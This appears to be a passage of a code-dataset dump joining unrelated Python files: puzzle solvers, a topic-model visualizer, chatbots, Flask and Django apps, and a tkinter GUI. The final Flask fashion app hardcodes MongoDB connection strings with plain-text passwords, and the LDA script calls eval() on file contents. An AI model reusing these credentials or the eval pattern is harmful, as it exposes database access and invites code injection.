removed_start.next.label,\n removed_start.next.next.label\n ]\n i = (self.current.label - 2) % self.size\n while (i + 1) in removed_labels:\n i = (i - 1) % self.size\n return i + 1\n\n\n @classmethod\n def make_with_labels(cls, labels):\n current = Node(labels[0])\n current_node = current\n for i in labels[1:]:\n next_node = Node(i)\n current_node.next = next_node\n current_node = next_node\n next_node.next = current\n return cls(current, len(labels))\n\n\n @classmethod\n def make_with_string_labels(cls, labels):\n labels = list(map(int, list(labels)))\n return cls.make_with_labels(labels)\n\n\n def __repr__(self):\n current_label = self.current.label\n labels = [current_label]\n next_node = self.current.next\n while next_node.label != current_label:\n labels.append(next_node.label)\n next_node = next_node.next\n return repr(labels)\n\n\ndef _part1(cll):\n '''Get the labels in order after label 1.'''\n n1 = cll.get_node_with_label(1)\n node = n1.next\n labels = []\n while node.label != 1:\n labels.append(node.label)\n node = node.next\n return ''.join(map(str, labels))\n\n\ndef test1():\n cll = CircularLinkedList.make_with_string_labels(TEST_INPUT)\n for _ in range(10):\n cll.move()\n x = _part1(cll)\n assert x == '92658374'\n\n\ndef test2():\n cll = CircularLinkedList.make_with_string_labels(TEST_INPUT)\n for _ in range(100):\n cll.move()\n x = _part1(cll)\n assert x == '67384529'\n\n\ndef part1():\n cll = CircularLinkedList.make_with_string_labels(INPUT)\n for _ in range(100):\n # print(f'-- move {i} --')\n # print(cll)\n cll.move()\n x = _part1(cll)\n return x\n\n\ndef part2():\n\n MAX = 50\n MOVES = 100\n\n start_labels = list(map(int, list(INPUT)))\n # print(start_labels)\n new_start = max(start_labels) + 1\n all_labels = start_labels + list(range(new_start, MAX + 1))\n # print('len all labels', len(all_labels))\n cll = CircularLinkedList.make_with_labels(all_labels)\n # print('cll.size', 
cll.size)\n # print('starting moves')\n for _ in range(MOVES):\n print(cll)\n cll.move()\n\n\ndef main():\n # test1()\n # test2()\n\n # p = part1()\n # print(p)\n\n p = part2()\n print(p)\n\n\nif __name__ == \"__main__\":\n main()\n # import timeit\n # x = timeit.timeit('main()', setup='from __main__ import main', number=1)\n # print(x)\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2020/python/day23old1.py","file_name":"day23old1.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28509334016","text":"import pyLDAvis\nimport pyLDAvis.gensim_models as gensimvis\nfrom gensim.models.ldamodel import LdaModel\nfrom gensim.corpora.dictionary import Dictionary\n\n# Load your topic model data\ntopics_file = \"topics.txt\"\ntopics_per_document_file = \"topics_per_document.txt\"\n\n# Read topics data\nwith open(topics_file, \"r\") as f:\n topics_data = f.readlines()\n\n# Process topics data\ntopics = []\nfor line in topics_data:\n parts = line.strip().split(\": \")\n topic_words = parts[1].split(\" + \")\n topic_words = [word.split(\"*\")[1].strip('\"') for word in topic_words]\n topics.append(topic_words)\n\n# Create a dictionary\ndictionary = Dictionary(topics)\n\n# Create a corpus\ncorpus = [dictionary.doc2bow(topic) for topic in topics]\n\n# Create an LDA model\nlda_model = LdaModel(corpus, num_topics=len(topics), id2word=dictionary)\n\n# Read topics per document data\nwith open(topics_per_document_file, \"r\") as f:\n topics_per_document_data = f.readlines()\n\n# Process topics per document data\ndocuments = []\nfor line in topics_per_document_data:\n parts = line.strip().split(\": \")\n document_id = int(parts[0].split()[1])\n topic_probs = eval(parts[1])\n document_topics = [(topic[0], topic[1]) for topic in topic_probs]\n documents.append(document_topics)\n\n# Create pyLDAvis visualization\nvis_data = gensimvis.prepare(lda_model, corpus, dictionary)\n\n# Save or display the visualization\npyLDAvis.save_html(vis_data, \"lda_visualization.html\")\n","repo_name":"Leventsoft/india_topic_modelling","sub_path":"visualization-script.py","file_name":"visualization-script.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8569787026","text":"import prompt\nimport math\ndef ocean():\n prompt.bot_say(\"Тихий океан є найбільшим за площею серед всіх океанів. \\nВін займає більше половини всієї поверхні Землі, його площа становить більше 180 мільйонів квадратних кілометрів\")\n\ndef sahara():\n prompt.bot_say(\"Сахара - це найбільша пустеля в світі, яка розташована в Північній Африці. 
\nВона простирається через 11 країн, включаючи Алжир, Чад, Єгипет, Лівію, Малі, Мавританію, Марокко, Нігер, Західну Сахару, Судан і Туніс\")\n\ndef find_dot():\n    prompt.bot_say(\"Бот: Введіть координату Х першої точки\")\n    (command, coordinate_x) = prompt.handle_input_as_float()\n    if command == prompt.Command.BACK:\n        return\n    if command == prompt.Command.EXIT:\n        prompt.bot_say(\"Бувайте!\")\n        exit(0)\n    prompt.bot_say(\"Введіть координату Y першої точки\")\n    (command, coordinate_y) = prompt.handle_input_as_float()\n    if command == prompt.Command.BACK:\n        return\n    if command == prompt.Command.EXIT:\n        prompt.bot_say(\"Бувайте!\")\n        exit(0)\n    prompt.bot_say(\"Введіть чому дорівнює відстань між точками\")\n    (command, distance_dots) = prompt.handle_input_as_float()\n    if command == prompt.Command.BACK:\n        return\n    if command == prompt.Command.EXIT:\n        prompt.bot_say(\"Бувайте!\")\n        exit(0)\n    prompt.bot_say(\"Введіть чому дорівнює азимут від першої точки до другої\")\n    (command, azimuth) = prompt.handle_input_as_float()\n    if command == prompt.Command.BACK:\n        return\n    if command == prompt.Command.EXIT:\n        prompt.bot_say(\"Бувайте!\")\n        exit(0)\n    azimuth_radians = math.radians(azimuth)\n    unknown_x = coordinate_x + distance_dots * math.cos(azimuth_radians)\n    unknown_y = coordinate_y + distance_dots * math.sin(azimuth_radians)\n    prompt.bot_say(f\"{unknown_x}, {unknown_y}\")\ndef distance_dots():\n    prompt.bot_say(\"Введіть координату Х першої точки\")\n    (command, first_coordinate_x) = prompt.handle_input_as_float()\n    if command == prompt.Command.BACK:\n        return\n    if command == prompt.Command.EXIT:\n        prompt.bot_say(\"Бувайте!\")\n        exit(0)\n    prompt.bot_say(\"Введіть координату Y першої точки\")\n    (command, first_coordinate_y) = prompt.handle_input_as_float()\n    if command == prompt.Command.BACK:\n        return\n    if command == prompt.Command.EXIT:\n        prompt.bot_say(\"Бувайте!\")\n        exit(0)\n    prompt.bot_say(\"Введіть координату X другої точки\")\n    (command, second_coordinate_x) = prompt.handle_input_as_float()\n    if command == prompt.Command.BACK:\n        return\n    if command == prompt.Command.EXIT:\n        prompt.bot_say(\"Бувайте!\")\n        exit(0)\n    prompt.bot_say(\"Введіть координату Y другої точки\")\n    (command, second_coordinate_y) = prompt.handle_input_as_float()\n    if command == prompt.Command.BACK:\n        return\n    if command == prompt.Command.EXIT:\n        prompt.bot_say(\"Бувайте!\")\n        exit(0)\n    distance = math.sqrt((second_coordinate_x - first_coordinate_x) ** 2 + (second_coordinate_y - first_coordinate_y) ** 2)\n    prompt.bot_say(f\"Відстань між двома точками: {distance}\")\n\ndef climates():\n    prompt.bot_say(\"Головні типи клімату: \\nТропічний \\nСубтропічний \\nЕкваторіальний \\nСередземноморський \\nМусонний \\nПрибережний \\nКонтинентальний \\nАрктичний \\nАнтарктичний\")\n\ndef ekvator():\n    prompt.bot_say(\"Екватор — уявне коло, проведене на поверхні планети на рівній відстані від обох географічних полюсів\")","repo_name":"zavgorodnyakateryna/chat-bot","sub_path":"geography_function.py","file_name":"geography_function.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"71392814226","text":"from waitress import serve\nfrom core.translate import Translate\nfrom utils.constants import FLASK_DEBUG, HOST, PORT\nfrom flask import Flask, request, make_response\n\napp = Flask(__name__)\n\n\ntranslate = Translate(True)\n\n\n@app.route('/translate', methods=['POST'])\ndef translate_handler():\n    request_body = request.json\n    if request_body is 
None:\n return make_response(\"Request body is None\", 400)\n result = translate.translate(\n text=request_body['q'], from_code=request_body['source'], to_code=request_body['target'])\n return make_response({\"translatedText\": result}, 201)\n\n\n@app.route('/languages', methods=['GET'])\ndef get_languages():\n langs = []\n for lang in translate.get_languages():\n langs.append({\"name\": lang.name, \"code\": lang.code})\n return make_response(langs, 200)\n\n\n@app.route('/check', methods=['GET'])\ndef check():\n return 'success'\n\n\nif FLASK_DEBUG:\n app.run(host=HOST, port=PORT)\nelse:\n serve(app, host=HOST, port=PORT)\n","repo_name":"kolserdav/ana","sub_path":"packages/translate2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"48"} +{"seq_id":"8388034480","text":"from django.conf.urls import url\n\nfrom settings.views import home, paginations, remove_category, download, format_date\n\nbase64_pattern=r'(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'\n\nurlpatterns=[\n\n url(r'^home/$', home, name=\"setting_home\"),\n url(r'^pagination/((?P[\\d]+))/$', paginations, name=\"setting_pagination\"),\n url(r'^category/remove/' + '(?P{})/$'.format(base64_pattern), remove_category,\n name=\"setting_category_remove\"),\n\n url(r'^download/' + '(?P{})/$'.format(base64_pattern), download,\n name=\"setting_download\"),\n url(r'^format/' + '(?P{})/$'.format(base64_pattern), format_date,\n name=\"setting_format\"),\n\n]\n","repo_name":"rubythonode/pinmyblogs","sub_path":"settings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8265028850","text":"import tkinter\nimport random\nfrom tkinter import *\nfrom tkinter import ttk\n\n\nroot = tkinter.Tk()\nroot.overrideredirect(True)\nvyska=root.winfo_screenheight()\nsirka=root.winfo_screenwidth()\nroot.geometry(\"{0}x{1}+0+0\".format(sirka, vyska))\nroot.config(bg='white')\nstart = 0\n\nhlavna_tema=\"Interná databáza \"\nhlavna_tema2=\"tovaru\"\n\nw = tkinter.Label(root, text=hlavna_tema,justify=tkinter.LEFT,font= ('Roboto',35)).place(x=sirka/25.6,y=vyska/15.428)\nw = tkinter.Label(root, text=hlavna_tema2,justify=tkinter.LEFT,font= ('Roboto',35)).place(x=sirka/9.6,y=vyska/8)\nwecka=tkinter.Label(root)\nwecka.place(x=-10,y=-10)\n##c = Canvas(root)\n##c.pack()\n\n\n##create.rectangle( 100, 100, 200, 200,root)\n##canvas.create_rectangle(275, 165, 525, 215, fill=\"#C2B6BF\")\ncanvas=tkinter.Canvas(bg='lightgrey',width=sirka-sirka/3.2,height=vyska)\ncanvas.place(x=sirka/3.2,y=0)\n\n\n\n\n\n\n\nprint(vyska)\nprint(sirka)\n\n\n##logo = tk.PhotoImage(file=\"python_logo_small.gif\")\n##\n##w1 = tk.Label(root, image=logo).pack(side=\"right\")\n##\n##explanation = \"\"\"At present, only GIF and PPM/PGM\n##formats are supported, but an interface \n##exists to allow additional image file\n##formats to be added easily.\"\"\"\n##--------------------------------Buttony--------------------------\n\n\nw1=0\n\n\ndef zelenina():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n m=canvas.create_rectangle(sirka/15,vyska/3.15,sirka/1.745,vyska/1.25,fill='beige',outline='beige')\n wecka.place_forget()\n w1 = tkinter.Label(root, text='Zelenina',font= ('Roboto',30))\n w1.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w1\n \n \n\n else:start=0\n \ndef ovocie():\n global 
start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n \n wecka.place_forget()\n w2=tkinter.Label(root, text='Ovocie',font= ('Roboto',30))\n w2.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w2\n \n\n else: start=0\n\ndef pecivo():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w3=tkinter.Label(root, text='Pečivo',font= ('Roboto',30))\n w3.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w3\n else: start=0\n\ndef maso():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w4=tkinter.Label(root, text='Mäso',font= ('Roboto',30))\n w4.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w4\n else: start=0\n\ndef mliecne_vyrobky():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w5=tkinter.Label(root, text='Mliečne výrobky',font= ('Roboto',30))\n w5.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w5\n else: start=0\n\ndef napoje():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w6=tkinter.Label(root, text='Nápoje',font= ('Roboto',30))\n w6.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w6\n else: start=0\n\ndef sladkosti_slanosti():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w7=tkinter.Label(root, text='Sladkosti/Slanosti',font= ('Roboto',30))\n w7.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w7\n else: start=0\n\ndef ostatne():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w8=tkinter.Label(root, text='Ostatné',font= ('Roboto',30))\n w8.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w8\n else: start=0\n\n##----------------------------------------------------------------------------\nname = tkinter.StringVar()\nnameEntered = ttk.Entry(root, font=(\"Roboto\", int(vyska/54)), textvariable = name)\nnameEntered.place(relx=sirka/2193.5, rely=vyska/1245.81,width=sirka/4.267,height=vyska/15.43, anchor='n')\n\nlabel = ttk.Label(root, text = \"Vlož názov a kód tovaru\", font=(\"Roboto\", int(vyska/75)))\nlabel.place(x=sirka/1.5311,y=vyska/1.206)\n##label.grid(column = 0, row = 0)\n\n\n\ndef clickMe():\n label.configure(text= 'NAZOV A KOD TOVARU ' + name.get())\n\n\n\n\n##-----------------------------------------------------------------------------------\ndef menu():\n global start\n if start==0:\n start=1\n menu = Toplevel(root)\n menu.title(\"New Window\")\n menu.geometry('200x200')\n Label(menu,text =\"This is a new window\").pack()\n else: start=0\n\nbuttonstart1=tkinter.Button(text=\"Zelenina\", width=int(sirka/90) ,font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=zelenina).place(x=sirka-sirka/1.05, y=vyska-vyska/1.3)\n\nbuttonstart1=tkinter.Button(text=\"Ovocie\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=ovocie).place(x=sirka-sirka/1.05, y=vyska-vyska/1.46)\n\nbuttonstart1=tkinter.Button(text=\"Pečivo\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=pecivo).place(x=sirka-sirka/1.05, y=vyska-vyska/1.665)\n\nbuttonstart1=tkinter.Button(text=\"Mäso\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n 
borderwidth=3,cursor=\"hand2\",command=maso).place(x=sirka-sirka/1.05, y=vyska-vyska/1.94)\n\nbuttonstart1=tkinter.Button(text=\"Mliečne výrobky\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=mliecne_vyrobky).place(x=sirka-sirka/1.05, y=vyska-vyska/2.327)\n\nbuttonstart1=tkinter.Button(text=\"Nápoje\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=napoje).place(x=sirka-sirka/1.05, y=vyska-vyska/2.9)\n\nbuttonstart1=tkinter.Button(text=\"Sladkosti/Slanosti\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=sladkosti_slanosti).place(x=sirka-sirka/1.05, y=vyska-vyska/3.86)\n\nbuttonstart1=tkinter.Button(text=\"Ostatné\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=ostatne).place(x=sirka-sirka/1.05, y=vyska-vyska/5.7)\n\n\n\nbuttonstart1=tkinter.Button(text=\"Pridat\", width=int(sirka/290),height=int(vyska/400),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=clickMe).place(x=sirka/1.12, y=vyska-vyska/5.7)\n","repo_name":"matuskolejak/interna-datbaza","sub_path":"modul_interna_databaza_Matus_Kolejak.py","file_name":"modul_interna_databaza_Matus_Kolejak.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6904690475","text":"\"\"\"\nConstants for the different states in the CloudCIX system\n\"\"\"\n\nIN_API = -1\nIGNORE = 0\nREQUESTED = 1\nBUILDING = 2\nUNRESOURCED = 3\nRUNNING = 4\nQUIESCE = 5\nQUIESCED = 6\nRESTART = 7\nSCRUB = 8\nSCRUB_QUEUE = 9\nRUNNING_UPDATE = 10\nRUNNING_UPDATING = 11\nQUIESCING = 12\nRESTARTING = 13\nSCRUB_PREP = 14\nQUIESCED_UPDATE = 15\nQUIESCED_UPDATING = 16\nSCRUBBING = 17\nCLOSED = 99\n\nVALID_RANGE = [*range(IGNORE, SCRUBBING + 1), CLOSED]\n\nROBOT_STATE_MAP = {\n REQUESTED: {BUILDING, UNRESOURCED},\n BUILDING: {UNRESOURCED, RUNNING},\n UNRESOURCED: {REQUESTED, QUIESCE, RESTART, SCRUB, RUNNING_UPDATE, QUIESCED_UPDATE},\n QUIESCE: {QUIESCING},\n RESTART: {RESTARTING},\n SCRUB: {SCRUB_PREP, SCRUBBING},\n RUNNING_UPDATE: {RUNNING_UPDATING},\n RUNNING_UPDATING: {UNRESOURCED, RUNNING},\n QUIESCED_UPDATE: {QUIESCED_UPDATING},\n QUIESCED_UPDATING: {UNRESOURCED, QUIESCED},\n QUIESCING: {UNRESOURCED, QUIESCED},\n RESTARTING: {UNRESOURCED, RUNNING},\n SCRUB_PREP: {UNRESOURCED, SCRUB_QUEUE},\n SCRUB_QUEUE: {SCRUBBING},\n SCRUBBING: {UNRESOURCED, CLOSED},\n}\n\nUSER_STATE_MAP = {\n RUNNING: {QUIESCE, SCRUB, RUNNING_UPDATE},\n QUIESCED: {RESTART, SCRUB, QUIESCED_UPDATE},\n SCRUB_QUEUE: {RESTART},\n}\n\nUSER_SNAPSHOT_STATE_MAP = {\n RUNNING: {RUNNING_UPDATE, SCRUB},\n}\n\nUSER_BACKUP_STATE_MAP = {\n RUNNING: {RUNNING_UPDATE, SCRUB},\n}\n\n# List of stable states a VM can be restored to when a Project is restored\nVM_RESTORE_STATES = [\n RUNNING,\n QUIESCED,\n]\n\n# Map showing what states to restore a VM to from the last stable state the VM was in when a Project is restored\nVM_RESTORE_MAP = {\n RUNNING: RESTART,\n QUIESCED: QUIESCED,\n}\n\nROBOT_PROCESS_STATES = {\n 
REQUESTED,\n    QUIESCE,\n    RUNNING_UPDATE,\n    QUIESCED_UPDATE,\n    RESTART,\n    SCRUB,\n}\n\n# Stable States\nSTABLE_STATES = [\n    RUNNING,\n    QUIESCED,\n    SCRUB_QUEUE,\n    CLOSED,\n]\n\n# BOM Create States - Set of states for which we should create new BOM entries\nBOM_CREATE_STATES = {\n    REQUESTED,\n    RUNNING_UPDATE,\n    QUIESCED_UPDATE,\n    SCRUB,\n    # Billing should resume if a VM is requested to restore from the SCRUB_QUEUE\n    RESTART,\n    QUIESCED,\n}\n\n# Billing Ignore States - set of states where we should set SKUs to 0\n# Must be a subset of BOM_CREATE_STATES to work properly\nBILLING_IGNORE_STATES = {\n    SCRUB,\n}\n\n# States customer can request that may require an email to be sent by robot\nSEND_EMAIL_STATES = [\n    REQUESTED,\n    QUIESCE,\n    RESTART,\n    SCRUB,\n    RUNNING_UPDATE,\n    QUIESCED_UPDATE,\n]\n","repo_name":"CloudCIX/iaas","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"12148215952","text":"'''\nWhat your program must do:\nThere are 10 ingredients and they each have a different price per kilo: 9, 5, 12, 15, 7, 42, 13, 10, 1 and 20.\n\nYour program must read 10 integers, the weight (in kilograms) to buy of each ingredient. It must compute the total cost of these purchases.\n'''\n\nprix_kilo = [9, 5, 12, 15, 7, 42, 13, 10, 1, 20]\ncout_total = 0\n\n# Loop over all 10 ingredients (the original range(5) only priced half the list)\nfor item in range(10):\n    qty = int(input(\"Enter the quantity: \"))\n\n    cout_total = cout_total + prix_kilo[item] * qty\nprint(cout_total)\n","repo_name":"vogtdale/python","sub_path":"franceIOI/Niveau2/DecouverteTableau/listeCourse.py","file_name":"listeCourse.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"12671038969","text":"from app import app\nfrom flask import render_template, request, redirect, url_for, session, g, flash\nfrom werkzeug.urls import url_parse\nfrom app.forms import LoginForm, RegistrationForm, QuestionForm, FitForm\nfrom app.models import User, Questions\nfrom app import db\nfrom pymongo import MongoClient \nimport collections\n\n\ncluster=MongoClient(\"mongodb+srv://shopsussed:Sustainable6%24@cluster0.lzaplut.mongodb.net/test\")\nmongo_db = cluster[\"sussed\"]\ncollection = mongo_db[\"outfits\"]\n\nuserdata=MongoClient(\"mongodb+srv://shopsussed:6hpEtbWvUE2LyNRx@userdata.j61zh2s.mongodb.net/?retryWrites=true&w=majority\")\nuser=userdata[\"user\"]\ndata=user[\"data\"]\n\n\n@app.before_request\ndef before_request():\n    g.user = None\n\n    if 'user_id' in session:\n        user = User.query.filter_by(id=session['user_id']).first()\n        g.user = user\n\n@app.route('/')\ndef home():\n    session['marks'] = ''\n    return render_template('index.html', title='Home')\n\n@app.route(\"/nouser\")\ndef nouser():\n    if not g.user:\n        user = User.query.filter_by(username=\"anonymous\").first()\n        if user is None:\n            return redirect(url_for('login'))\n        session['user_id'] = user.id\n        session['marks'] = ''\n    return redirect(url_for('findfit'))\n\n@app.route('/findfit', methods=['GET', 'POST'])\ndef findfit():\n    session['marks'] = ''\n    form = FitForm()\n    if form.validate_on_submit():\n\n        print(form.top.data)\n        user = User.query.filter_by(username=g.user.username).first()\n        print(form.gender.data.lower())\n        if form.gender.data.lower() == 'male' or form.gender.data.lower()==\"female\":\n            user.set_gender(form.gender.data)\n            user.set_top(form.top.data)\n            user.set_pants(form.pants.data)\n            
user.set_shoes(form.shoes.data)\n db.session.commit()\n print(g.user.pants)\n print(g.user.top)\n print(g.user.shoes)\n user_info ={ \"gender\": g.user.gender, \"pant-size\": g.user.pants, \"top-size\":g.user.top, \"shoe-size\": g.user.shoes}\n data.insert_one(user_info)\n session['marks'] = ''\n # next_page = request.args.get('next')\n # if not next_page or url_parse(next_page).netloc != '':\n # next_page = url_for('buildwardrobe')\n else:\n return redirect(url_for('findfit'))\n return redirect(url_for('buildwardrobe'))\n return render_template('findfit.html', title='Find Fit', form=form)\n\n@app.route('/buildwardrobe')\ndef buildwardrobe():\n print(g.user.gender)\n print(g.user.pants)\n print(g.user.top)\n print(g.user.shoes)\n session['marks'] = ''\n return render_template('buildwardrobe.html', title='Build Wardrobe')\n\n@app.route('/sussedstyle')\ndef sussedstyle():\n session['marks'] = ''\n if g.user.gender.lower() == 'male':\n return redirect(url_for('menquestion', id=1))\n if g.user.gender.lower() == \"female\":\n return redirect(url_for('womenquestion', id=1))\n return render_template('sussedstyle.html', title='Sussed Style')\n\n@app.route('/selectstyle')\ndef selectstyle():\n if g.user.gender==\"Male\":\n return redirect(url_for('menselectstyle'))\n elif g.user.gender==\"Female\":\n return redirect(url_for(\"womenselectstyle\"))\n\n@app.route('/menselectstyle')\ndef menselectstyle():\n return render_template(\"menselectstyle.html\", title=\"Select Style\")\n\n@app.route('/womenselectstyle')\ndef womenselectstyle():\n return render_template(\"womenselectstyle.html\", title=\"Select Style\")\n\n@app.route('/rooftop')\ndef rooftop():\n session['marks'] = 'r'\n return redirect(url_for('score'))\n\n@app.route('/old')\ndef old():\n session['marks'] = 'o'\n return redirect(url_for('score'))\n\n@app.route('/everyday')\ndef everyday():\n session['marks'] = 'e'\n return redirect(url_for('score'))\n\n@app.route('/summer')\ndef summer():\n session['marks'] = 's'\n return redirect(url_for('score'))\n\n@app.route('/streetwear')\ndef streetwear():\n session['marks'] = 'w'\n return redirect(url_for('score'))\n\n@app.route('/business')\ndef business():\n session['marks'] = 'b'\n return redirect(url_for('score'))\n\n@app.route('/casual')\ndef casual():\n session['marks'] = 'c'\n return redirect(url_for('score'))\n\n@app.route('/feminine')\ndef feminine():\n session['marks'] = 'f'\n return redirect(url_for('score'))\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n return redirect(url_for('login'))\n session['user_id'] = user.id\n session['marks'] = ''\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('home')\n return redirect(next_page)\n return redirect(url_for('home'))\n if g.user:\n return redirect(url_for('home'))\n return render_template('login.html', form=form, title='Login')\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data, email=form.email.data)\n user.set_password(form.password.data)\n db.session.add(user)\n db.session.commit()\n session['user_id'] = user.id\n session['marks'] = ''\n session['gender'] = ''\n return redirect(url_for('home'))\n if g.user:\n return redirect(url_for('home'))\n return 
render_template('register.html', title='Register', form=form)\n\n\n@app.route('/menquestion/<int:id>', methods=['GET', 'POST'])\ndef menquestion(id):\n    form = QuestionForm()\n    q = Questions.query.filter_by(q_id=id, c=\"men\").first()\n    if not q:\n        print(session['marks'])\n        return redirect(url_for('score'))\n    if request.method == 'POST':\n        option = request.form['options']\n        if \"everyday\" in option:\n            session['marks'] += 'e'\n        elif \"summer\" in option:\n            session['marks'] += 's'\n        elif \"old\" in option:\n            session['marks'] += 'o'\n        elif \"streetwear\" in option:\n            session['marks'] += 'w'\n        elif \"rooftop\" in option:\n            session['marks'] +='r'\n        print(option)\n        return redirect(url_for('menquestion', id=(id+1)))\n    form.options.choices = [(q.a, q.a), (q.b, q.b)]\n    return render_template('question.html', form=form, q=q, title='Question {}'.format(id), percent=str(round((100/5)*(id-1),2)))\n\n@app.route('/womenquestion/<int:id>', methods=['GET', 'POST'])\ndef womenquestion(id):\n    form = QuestionForm()\n    q = Questions.query.filter_by(q_id=id+10, c=\"women\").first()\n    if not q:\n        print(session['marks'])\n        return redirect(url_for('score'))\n    if request.method == 'POST':\n        option = request.form['options']\n        if \"business\" in option:\n            session['marks'] += 'b'\n        elif \"casual\" in option:\n            session['marks'] += 'c'\n        elif \"feminine\" in option:\n            session['marks'] += 'f'\n        print(option)\n        return redirect(url_for('womenquestion', id=(id+1)))\n    form.options.choices = [(q.a, q.a), (q.b, q.b)]\n    return render_template('question.html', form=form, q=q, title='Question {}'.format(id), percent=str(round((100/9)*(id-1),2)))\n\n\n@app.route('/score')\ndef score():\n    match1 = session['marks']\n    outfits = []\n    if match1!='':\n        all_freq = {}\n        for i in match1:\n            if i in all_freq:\n                all_freq[i] += 1\n            else:\n                all_freq[i] = 1\n        res = max(all_freq, key = all_freq.get)\n        if res=='e':\n            text=\"Cozy/Comfortable\"\n        elif res =='s':\n            text=\"Night Out\"\n        elif res == 'o':\n            text = \"Keep it Cool\"\n        elif res=='w':\n            text=\"Streetwear\"\n        elif res == 'r':\n            text=\"Sophisticated/Dapper\"\n        elif res=='b':\n            text = \"Stay Ready/Business Chic\"\n        elif res=='c':\n            text = \"Easy Breezy Stylish/Casual Chic\"\n        elif res=='f':\n            text='For the Girlies/Feminine Chic'\n        else:\n            text=''\n        result = collection.find({'type': res})\n        for listing in result:\n            outfit = []\n            shirt_data = {}\n            pants_data = {}\n            accessories_data ={}\n            jacket_data = {}\n            shoes_data = {}\n            for item in listing:\n                if \"shirt\" in item:\n                    if listing[item]!='':\n                        if 'image' in item:\n                            shirt_data['image']=listing[item]\n                        elif 'name' in item:\n                            shirt_data['name'] = listing[item]\n                        else:\n                            shirt_data['link']=listing[item]\n                if \"pants\" in item:\n                    if listing[item]!='':\n                        if 'image' in item:\n                            pants_data['image']=listing[item]\n                        elif 'name' in item:\n                            pants_data['name'] = listing[item]\n                        else:\n                            pants_data['link']=listing[item]\n                if \"accessories\" in item:\n                    if listing[item]!='':\n                        if 'image' in item:\n                            accessories_data['image']=listing[item]\n                        elif 'name' in item:\n                            accessories_data['name'] = listing[item]\n                        else:\n                            accessories_data['link']=listing[item]\n                if \"jacket\" in item:\n                    if listing[item]!='':\n                        if 'image' in item:\n                            jacket_data['image']=listing[item]\n                        elif 'name' in item:\n                            jacket_data['name'] = listing[item]\n                        else:\n                            jacket_data['link']=listing[item]\n                if \"shoes\" in 